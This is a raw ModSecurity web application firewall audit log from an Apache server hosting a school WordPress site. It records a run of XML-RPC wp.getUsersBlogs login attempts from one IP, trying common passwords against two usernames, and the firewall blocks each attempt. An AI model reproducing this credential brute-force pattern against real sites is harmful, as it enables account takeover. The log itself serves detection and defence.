14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3be4200c-C-- wp.getUsersBlogs wakakur Marketing2024 --3be4200c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be4200c-E-- --3be4200c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512628204310 5192 (- - -) Stopwatch2: 1745512628204310 5192; combined=3696, p1=427, p2=3092, p3=0, p4=0, p5=105, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be4200c-Z-- --aae3e95c-A-- [24/Apr/2025:23:38:08 +0700] aApo8MlQo524fhbIj1x1UQAAABE 103.236.140.4 37170 103.236.140.4 8181 --aae3e95c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --aae3e95c-C-- wp.getUsersBlogs wakakur abc123456 --aae3e95c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aae3e95c-E-- --aae3e95c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (91+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512688646286 4439 (- - -) Stopwatch2: 1745512688646286 4439; combined=3120, p1=387, p2=2587, p3=0, p4=0, p5=85, sr=74, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aae3e95c-Z-- --0d0a9f07-A-- [24/Apr/2025:23:39:08 +0700] aAppLN5yz20UX9VrdZO5owAAAEE 103.236.140.4 40958 103.236.140.4 8181 --0d0a9f07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0d0a9f07-C-- wp.getUsersBlogs wakakur pass@word --0d0a9f07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d0a9f07-E-- --0d0a9f07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (105+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512748001329 4902 (- - -) Stopwatch2: 1745512748001329 4902; combined=3746, p1=442, p2=3131, p3=0, p4=0, p5=102, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d0a9f07-Z-- --4d2e8d42-A-- [24/Apr/2025:23:40:08 +0700] aAppaN5yz20UX9VrdZO64AAAAEI 103.236.140.4 44754 103.236.140.4 8181 --4d2e8d42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4d2e8d42-C-- wp.getUsersBlogs wakakur codeword --4d2e8d42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d2e8d42-E-- --4d2e8d42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512808052657 4826 (- - -) Stopwatch2: 1745512808052657 4826; combined=3391, p1=406, p2=2827, p3=0, p4=0, p5=92, sr=76, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d2e8d42-Z-- --a2848844-A-- [24/Apr/2025:23:41:15 +0700] aAppq95yz20UX9VrdZO8CAAAAE4 103.236.140.4 49122 103.236.140.4 8181 --a2848844-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a2848844-C-- wp.getUsersBlogs wakakur passw --a2848844-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2848844-E-- --a2848844-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (94+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512875504207 5199 (- - -) Stopwatch2: 1745512875504207 5199; combined=3561, p1=397, p2=2993, p3=0, p4=0, p5=98, sr=73, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2848844-Z-- --9ab75457-A-- [24/Apr/2025:23:41:32 +0700] aAppvMlQo524fhbIj1x4NwAAAAk 103.236.140.4 50170 103.236.140.4 8181 --9ab75457-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9ab75457-C-- wp.getUsersBlogs wakakur 1234%^&* --9ab75457-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ab75457-E-- --9ab75457-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512892452220 4668 (- - -) Stopwatch2: 1745512892452220 4668; combined=3173, p1=384, p2=2631, p3=0, p4=0, p5=96, sr=79, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ab75457-Z-- --13966911-A-- [24/Apr/2025:23:42:15 +0700] aApp5_iVYlyO1xhz7yOkbQAAAMI 103.236.140.4 52956 103.236.140.4 8181 --13966911-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --13966911-C-- wp.getUsersBlogs wakakur chelsea --13966911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13966911-E-- --13966911-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (121+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512935022781 3769 (- - -) Stopwatch2: 1745512935022781 3769; combined=2579, p1=331, p2=2080, p3=0, p4=0, p5=95, sr=61, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13966911-Z-- --34989a02-A-- [24/Apr/2025:23:43:15 +0700] aApqI_iVYlyO1xhz7yOlYgAAAMk 103.236.140.4 56906 103.236.140.4 8181 --34989a02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --34989a02-C-- wp.getUsersBlogs wakakur 20100728 --34989a02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34989a02-E-- --34989a02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745512995555345 5483 (- - -) Stopwatch2: 1745512995555345 5483; combined=3813, p1=412, p2=3200, p3=0, p4=0, p5=115, sr=83, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34989a02-Z-- --31a9e97a-A-- [24/Apr/2025:23:44:15 +0700] aApqX8lQo524fhbIj1x7hwAAAAk 103.236.140.4 60418 103.236.140.4 8181 --31a9e97a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --31a9e97a-C-- wp.getUsersBlogs wakakur cowboys --31a9e97a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31a9e97a-E-- --31a9e97a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513055354716 4121 (- - -) Stopwatch2: 1745513055354716 4121; combined=2957, p1=369, p2=2446, p3=0, p4=0, p5=84, sr=70, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31a9e97a-Z-- --c24ea707-A-- [24/Apr/2025:23:45:15 +0700] aApqm2Luk3f9kLjsdTZ6YgAAAIE 103.236.140.4 36104 103.236.140.4 8181 --c24ea707-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c24ea707-C-- wp.getUsersBlogs wakakur nikita --c24ea707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c24ea707-E-- --c24ea707-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (117+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513115795144 5144 (- - -) Stopwatch2: 1745513115795144 5144; combined=3858, p1=467, p2=3191, p3=0, p4=0, p5=115, sr=88, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c24ea707-Z-- --cf365027-A-- [24/Apr/2025:23:46:16 +0700] aApq2PiVYlyO1xhz7yOoeAAAAMk 103.236.140.4 39892 103.236.140.4 8181 --cf365027-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 238 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cf365027-C-- wp.getUsersBlogs wakahumas wordpress_administrator --cf365027-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf365027-E-- --cf365027-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513176014219 5906 (- - -) Stopwatch2: 1745513176014219 5906; combined=4465, p1=578, p2=3686, p3=0, p4=0, p5=116, sr=152, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf365027-Z-- --f046da29-A-- [24/Apr/2025:23:47:17 +0700] aAprFclQo524fhbIj1x_TwAAAAc 103.236.140.4 43866 103.236.140.4 8181 --f046da29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f046da29-C-- wp.getUsersBlogs wakahumas marketing2010_ --f046da29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f046da29-E-- --f046da29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513237067267 4613 (- - -) Stopwatch2: 1745513237067267 4613; combined=3523, p1=446, p2=2917, p3=0, p4=0, p5=93, sr=91, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f046da29-Z-- --e1e95348-A-- [24/Apr/2025:23:48:18 +0700] aAprUslQo524fhbIj1yAhQAAAAQ 103.236.140.4 46828 103.236.140.4 8181 --e1e95348-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e1e95348-C-- wp.getUsersBlogs wakahumas admin123456 --e1e95348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1e95348-E-- --e1e95348-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513298159386 4753 (- - -) Stopwatch2: 1745513298159386 4753; combined=3699, p1=433, p2=3085, p3=0, p4=0, p5=105, sr=87, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1e95348-Z-- --caef6516-A-- [24/Apr/2025:23:49:18 +0700] aAprjslQo524fhbIj1yBuAAAAAc 103.236.140.4 49370 103.236.140.4 8181 --caef6516-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --caef6516-C-- wp.getUsersBlogs wakahumas 1qaz@2wsx --caef6516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --caef6516-E-- --caef6516-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513358375551 17458 (- - -) Stopwatch2: 1745513358375551 17458; combined=28556, p1=449, p2=3084, p3=0, p4=0, p5=12526, sr=92, sw=80, l=0, gc=12417 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --caef6516-Z-- --bebcfc14-A-- [24/Apr/2025:23:50:23 +0700] aAprz8lQo524fhbIj1yCgwAAAAI 103.236.140.4 52192 103.236.140.4 8181 --bebcfc14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bebcfc14-C-- wp.getUsersBlogs wakahumas qqq --bebcfc14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bebcfc14-E-- --bebcfc14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513423792924 4986 (- - -) Stopwatch2: 1745513423792924 4986; combined=3608, p1=496, p2=2952, p3=0, p4=0, p5=94, sr=95, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bebcfc14-Z-- --7827ed77-A-- [24/Apr/2025:23:51:03 +0700] aApr98lQo524fhbIj1yDCgAAAAQ 103.236.140.4 53970 103.236.140.4 8181 --7827ed77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7827ed77-C-- wp.getUsersBlogs wakahumas 1234%^&* --7827ed77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7827ed77-E-- --7827ed77-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745513463917559 5216 (- - -) Stopwatch2: 1745513463917559 5216; combined=3724, p1=447, p2=3107, p3=0, p4=0, p5=101, sr=87, sw=69, l=0, gc=0 